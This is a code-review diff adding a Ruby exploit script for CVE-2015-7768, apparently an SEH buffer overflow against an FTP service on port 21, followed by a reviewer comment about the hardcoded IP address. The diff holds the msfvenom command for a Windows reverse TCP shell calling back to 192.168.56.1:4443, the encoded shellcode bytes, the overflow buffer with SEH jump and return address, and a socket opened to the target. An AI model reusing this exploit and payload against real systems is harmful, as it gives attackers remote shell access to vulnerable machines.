CVE-2015-7768/cve-2015-7768_exploit.rb

```diff
@@ -0,0 +1,62 @@
+
+#The command used to create the shell, the shell size is: 405 bytes
+#msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4443 -e x86/shikata_ga_nai -b "\x00\x0d\x0a\x3d\x5c\x2f" -i 3 -f ruby
+
+
+buf =  ""
+buf += "\xbf\x7d\x46\x78\xfb\xd9\xc2\xd9\x74\x24\xf4\x58\x33"
+buf += "\xc9\xb1\x5f\x83\xe8\xfc\x31\x78\x10\x03\x78\x10\x9f"
+buf += "\xb3\xc6\xcc\xc8\xa8\x61\xe8\x2d\x09\xf9\x2a\x25\xf0"
+buf += "\x2b\xfa\x74\x5d\x1d\x8e\x63\xdd\xb7\x92\x88\x93\x56"
+buf += "\x89\x4c\x1e\x06\xc2\x08\xf7\x2c\xb7\x23\xa8\xa9\x96"
+buf += "\x45\xca\xff\x0f\xd8\xe7\x46\x8e\x18\x9f\x80\xfc\xb1"
+buf += "\x5f\xa5\x03\xb5\x98\x46\xee\x12\xc7\xd8\x9b\xf7\x0e"
+buf += "\x74\xdb\xf1\x51\x5a\xca\xce\x83\x05\x11\x0c\x22\xaf"
+buf += "\x51\x5e\xc5\x05\x37\x13\x6f\xc8\x95\x84\x02\x28\xef"
+buf += "\x15\xac\xde\x83\xa7\x93\xc6\x9c\xb4\x5b\xdc\x84\x9a"
+buf += "\x2b\xaa\xe9\x54\x76\x9b\x4d\xeb\xcb\x1c\x40\x30\x11"
+buf += "\xc2\x89\xfe\x0e\xc9\x5a\xbb\xee\x02\x4d\x8a\x4d\xe3"
+buf += "\xa5\x75\x0c\x3e\xcf\x61\xa3\x8a\x02\xa5\x24\xd6\xa9"
+buf += "\xd7\x6a\xe1\x87\xf4\x10\x87\xa5\xe8\x41\x0c\x31\x05"
+buf += "\x4d\xbe\xae\x32\x59\x61\xb3\x8b\xd8\x85\xc3\x4f\xb5"
+buf += "\x0e\xe2\x36\x61\xe2\xce\x2a\xce\x28\x8c\x10\x06\x1d"
+buf += "\x16\x9e\xac\xf2\xae\x97\xd6\xa9\x12\x14\xb4\x52\x5e"
+buf += "\xb1\x30\xf0\xb2\x7d\x10\xa9\x61\xb8\x72\xbb\x8e\x07"
+buf += "\xbf\x3e\x9c\x20\xe5\x8d\x9a\xd2\x1b\xd8\xf7\x7b\x58"
+buf += "\xf5\x8d\x8d\x83\x09\xad\x7a\xb4\x82\x3a\x34\x20\x91"
+buf += "\xe7\xe3\x78\xff\x9e\x0e\x9e\x98\xde\xf0\x14\x25\xfa"
+buf += "\xcb\x12\xda\x66\x79\xff\xd3\x2b\x56\x31\x52\x5a\x83"
+buf += "\x05\x8f\x49\x4a\x35\x46\x91\xee\xc2\x16\x4c\x32\x5b"
+buf += "\x38\x2a\xa4\x02\xc8\x61\x9e\xc2\xd0\x55\x2c\x1a\x37"
+buf += "\x55\xbe\x71\xb8\x7a\x73\x46\x68\x14\x5b\x88\xec\xfd"
+buf += "\x3e\xe6\x19\xf8\x3a\x04\xea\x1f\x3c\x34\xb0\xfd\x5a"
+buf += "\x06\x4a\xea\x60\x6e\xf8\x1a\x98\xc2\xb7\x3c\xb0\x49"
+buf += "\x57\x8e\x84\xbf\x98\xda\x22\x9c\xad\xfc\x16\x78\x58"
+buf += "\x7c\x03\x64\xd5\x5f\x70\xa2\xab\x20\xf0\xbf\xaa\xb7"
+buf += "\x93\xd5\x8b\x9b\x26\x4c\x92\x7b\xd0\xcd\xb1\xdc\x61"
+buf += "\x2c\x9b\xe3\x8a\x13\x0c\x4d\x0c\x23\xb3\x08\xb9\x04"
+buf += "\x7c\x47"
+
+#nSEH = "\xEB\x13\x90\x90"
+#SEH = "\x9D\x6D\x20\x12" >> 12206D9D
+buffer = "\x41" * 1037 + "\xeb\x0a\x90\x90" + "\x9D\x6D\x20\x12" + "\x90" *30 +  buf +  "D"*1955
+#buffer = "\x41" * 1060
+print "sending evil buffer...."
+s = TCPSocket.new('192.168.56.101', 21)
```

Comment:
Please try to avoid hardcoded IP address, it would be great to take it from the user